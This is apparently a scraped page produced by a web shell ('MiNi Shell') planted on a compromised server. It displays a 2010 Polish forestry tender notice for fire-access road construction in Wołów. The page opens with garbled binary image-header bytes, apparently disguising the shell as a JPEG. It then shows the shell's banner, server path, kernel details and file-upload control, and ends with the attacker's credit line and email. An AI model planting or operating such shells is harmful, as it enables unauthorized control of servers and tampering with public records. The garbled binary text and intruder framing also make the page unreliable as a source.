JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101007/323854-N-2010.html

<p class="kh_header"><b>Wołów: Budowa dojazdu pożarowego nr 02-50 i 04-50</b><br>
<b>Numer ogłoszenia: 323854 - 2010; data zamieszczenia: 07.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Wołów , ul. Leśna 37, 56-100 Wołów, woj. dolnośląskie, tel. 071 3809361, faks 071 3809361.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dojazdu pożarowego nr 02-50 i 04-50.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane: budowa dojazdu pożarowego nr 02-50 i 04-50 na terenie Leśnictwa Dębno i Tarchalice o długości 2395 mb zgodnie ze specyfikacją techniczna przedmiotu zamówienia - dokumentacją projektową (załącznik nr 2 cz. I, II, III, IV, V, VI, VII) do SIWZ, przedmiarem robót stanowiącym załącznik nr 3 do SIWZ.
2.	Szczegółowy opis przedmiotu zamówienia znajduje się w Specyfikacji technicznej przedmiotu zamówienia - dokumentacji projektowej przedmiarze robót stanowiącej załącznik nr 2 cz. I, II, III, IV, V, VI, VII do SIWZ, przedmiarze robót stanowiącym załącznik nr 3 do SIWZ.
Opis projektowanego dojazdu
Projektowany dojazd przebiega po trasie istniejącej drogi leśnej o nawierzchni gruntowej , jej dokładny przebieg został zaznaczony na załączonej mapie orientacyjnej. Istniejący pas wylesiony ma szerokość od 6,00 do 11,00 m.
W ciągu projektowanego dojazdu w miejscach naturalnych zaniżeń terenu w km 1+450, 1+975 zaprojektowano przepusty z rur żelbetowych o średnicy 60 cm dla odprowadzenia
wód powierzchniowych w przyległy teren. Z uwagi na stosunkowo małą powierzchnię zlewni dla projektowanych przepustów przyjęto konstrukcyjnie średnicę 60 cm.
Projektowane rowy i przepusty nie posiadają naturalnych odpływów z wyjątkiem istniejącego przepustu sklepionego ceglanego w km 0+681 (odcinek dodatkowy) usytuowanego na rowie odkrytym .
Na drogi i linie oddziałowe dochodzące do projektowanej trasy zaprojektowano zjazdy w postaci skrzyżowań.
W celu ułatwienia ruchu w ciągu drogi zaprojektowano 11 typowych mijanek.
Mijanki zlokalizowane są w odległości maksymalnie. 300,00m od siebie z widocznością
z jednej na drugą. Takie rozmieszczenie pozwala na swobodne mijanie się pojazdów służby leśnej i zestawów z drewnem.
Warunki gruntowo-wodne:
Na podstawie wykonanych sond stwierdzono występowanie piasków oraz piasków gliniastych. Miejscami pomiędzy warstwami piasku gliniastego występują przewarstwienia piasku. Na omawianym odcinku warstwa humusu ma grubość około 20 cm , albo nie występuje. Do głębokości 1,50 m poniżej terenu nie stwierdzono występowania wód gruntowych.
Parametry techniczne:
Dla projektowanej drogi leśnej przyjęto następujące parametry techniczne :
- klasa drogi				 D
- prędkość projektowa			 30 km/h
- szerokość korony drogi		 5,00 m
- szerokość jezdni			 3,50 m
- szerokość poboczy			 2 x 0,75 m
- spadek poprzeczny			 daszkowy 3%
- droga jednopasmowa z mijankami
- nośność konstrukcji jezdni		 do 80 kN/os

Skrzyżowania zaprojektowano z wyokrągleniem włączenia łukami poziomymi o promieniu 11,00 m , szerokości jezdni 3,50 m i długości 12,00 m, konstrukcja
nawierzchni jak dla jezdni głównej.

Łuki poziome
Załamania osi trasy spowodowane chęcią wykorzystania do maksimum istniejącego
przebiegu drogi wyokrąglono łukami poziomymi. Projektowane promienie łuków poziomych z uwagi na prędkość projektową nie wymagają poszerzeń pasa ruchu zastosowano jedynie przechyłki jednostronne. W obrębie projektowanych skrzyżowań projektuje się wyokrąglenie przecięcia krawędzi nawierzchni drogi głównej i podporządkowanej łukami kołowymi o promieniu min. 11,00 m na długości których należy wykonać nawierzchnię utwardzoną na drodze podporządkowanej identyczną jak dla drogi głównej.
Łuki pionowe
Projektowane niweleta drogi posiada spadki podłużne od 0,30 do 0,54 %. Projektowane łuki pionowe wklęsłe oraz wypukłe z uwagi na małe sumy spadków podłużnych nie wymagają wyokrąglenia.
Konstrukcja nawierzchni drogi:
Dla projektowanej drogi zaprojektowano dwuwarstwową nawierzchnię z kruszywa kamiennego łamanego stabilizowanego mechanicznie. Górna warstwa grubości 8 cm a dolna grubości 15 cm. Nawierzchnię z kruszywa kamiennego należy wykonać na wcześniej wykonanej warstwie odsączającej z piasku grubości 15 cm . Warstwę odsączającą należy ułożyć na całej szerokości korony drogi , aby uniknąć konieczności budowy sączków pod poboczami , co skomplikowałoby technologię wykonania konstrukcji nawierzchni. Projektowane grubości warstw uwzględniają ich zagęszczenie. Budowa nawierzchni z kruszyw kamiennych musi odpowiadać wymaganiom normowym i być wykonana z kruszyw łamanych następujących frakcji : warstwa dolna o frakcji 40-60 mm a warstwa górna o frakcji 20-40 mm z dodatkiem klińca kamiennego o frakcji 5-25 mm i miału kamiennego 0-5 mm. Pobocza drogi należy uformować z gruntu miejscowego co wynika z bilansu robót ziemnych.
Odwodnienie
Projektowana dojazd będzie odwadniany powierzchniowo. Zaprojektowane spadki poprzeczne jezdni i poboczy zapewniają prawidłowy spływ wód powierzchniowych do rowów przydrożnych. Dla jezdni przyjęto spadek poprzeczny 3% a dla poboczy 5%. Z uwagi na ukształtowanie terenu zaprojektowano rowy jednostronne oraz dwustronne.
Rowy dwustronne zaprojektowano od km 0+425 do 2+395 na pozostałym odcinku zaprojektowano rów jednostronny. Spadki podłużne projektowanej drogi wahają się od 0,30% do 0,54 %. Wody opadowe spływające z korony dojazdu do rowów przydrożnych będą odprowadzane w obrębie skrzyżowań w przyległy teren z wykorzystaniem projektowanych przepustów z rur AROTA o średnicy o średnicy 40 cm.

Dla projektowanych przepustów rzędne posadowienia w osi drogi pokazano na profilu podłużnym , natomiast rzędne wlotu i wylotu na przekrojach poprzecznych projektowanego dojazdu.
Roboty ziemne
Roboty ziemne związane z budową drogi należy wykonać zgodnie obowiązującą normą. Podczas wykonywania robót zachowywać bezpieczeństwo zgodnie z ustaleniami ustawy.
Mijanki i składnice na drewno
Dla wymijania się pojazdów wzdłuż projektowanej trasy drogi jednopasowej zaprojektowano 11 mijanek o długości 43,00 m ( odcinek prosty o długości 25,00 m plus dwa skosy 1:3 długości 7,50 m) i szerokości 2,50 m o identycznej konstrukcji nawierzchni i takim spadku w przekroju poprzecznym jak droga główna.
W przedmiarze robót ujęto wykonanie 4 składnic na drewno o parametrach geometrycznych i konstrukcji nawierzchni jak dla projektowanych mijanek przy czym w części rysunkowej nie zaznaczono ich lokalizacji. Lokalizacja składnic zostanie ustalona w trakcie wykonawstwa robót z leśniczym danego Leśnictwa .
Urządzenia obce
Na podstawie przeprowadzonego wywiadu terenowego , jak również rozpoznania na miejscu nie stwierdzono występowania urządzeń obcych w obrębie projektowanej drogi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w stosunku do zamówienia przewiduje możliwości udzielenia zamówienia uzupełniającego o którym mowa w art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych w wysokości nie przekraczającej 50 %wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w terminie do dnia 21.10.2010 r.
do godz. 15.00. W przypadku wniesienia wadium w pieniądzu- w formie przelewu,
za moment wniesienia wadium uznaje się moment uznania rachunku zamawiającego. 
2.	Zamawiający ustala na podstawie art. 45 ust.4 u PZP  dla całości przedmiotu zamówienia  w wysokość: 13113,00 zł.
3.	Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej formie:
3.1	pieniądzu, przelewem na rachunek bankowy: 
PKO BP o.Wołów 50 1020 5242 0000 2502 0016 9748 
z adnotacją wadium na dojazd pożarowy nr 02-50, 04-50.
3.2	poręczeniach bankowych lub poręczeniach spółdzielczych kasy oszczędnościowo   - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.3	gwarancjach bankowych;
3.4	gwarancjach ubezpieczeniowych,
3.5	 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm. )

W przypadku wniesienia wadium w jednej z form zawartych w punkcie 3, w podpunktach do 3.2 do 3.5 rozdziału VII SIWZ należy  je złożyć w kasie nadleśnictwa pokój nr 17 w terminie do dnia 21.10.2010 r. do godz. 15. 00.

4.	W zakresie wadium obowiązują uregulowania ustawy Prawo zamówień publicznych zawarte w art. 45 i 46.

5.	W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu o udzielenie zamówienia, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:
1) 	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) 	posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; szczegółowe wymogi dotyczące powyższego warunku określonych w pkt. 7.2. specyfikacji istotnych warunków zamówienia,
3) 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,	
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP.
	

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą: spełnia - nie spełnia na podstawie złożonych dokumentów. Niespełnienie, chociaż jednego z wyżej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania i uznaniem jego oferty za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do zamówienia zamawiający uzna za spełnione warunki udziału w postępowaniu, jeżeli Wykonawca:
a)	posiada doświadczenie polegające na wykonaniu w okresie 3 lat przed wszczęciem postępowania (a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie) co najmniej 3 prac związanych z  budową lub remontem dróg leśnych o wartości co najmniej 500 000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do potencjału technicznego Zamawiający wymaga od Wykonawcy dysponowania:
- koparko - ładowarką
- równiarką drogową
-  walcem wibracyjnym o ciężarze min. 10 tony
- min. trzema. samochodami dostawczymi , maksymalnie. trzyosiowymi o ładowności do 15 ton</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5.	Dokumenty stwierdzające , że kierownik budowy, który będzie uczestniczyć w realizacji zamówienia posiada uprawnienia takie jak:
- Aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa,
- Uprawnienia budowlane
      6.	Pisemne zobowiązanie innych podmiotów do:
-	udostępnienia potencjału technicznego,</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 

2.	Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. 

3.	Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania Umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż Umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu Umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. 

4.	Zamawiający niezależnie od powyższego, dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji Przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. 

5.	Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolow.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Wołów , ul. leśna 37, 56-100 Wołów pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 09:30, miejsce: Nadleśnictwo Wołów, ul Leśna 37, 56-100 Wołów, pok nr 13 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com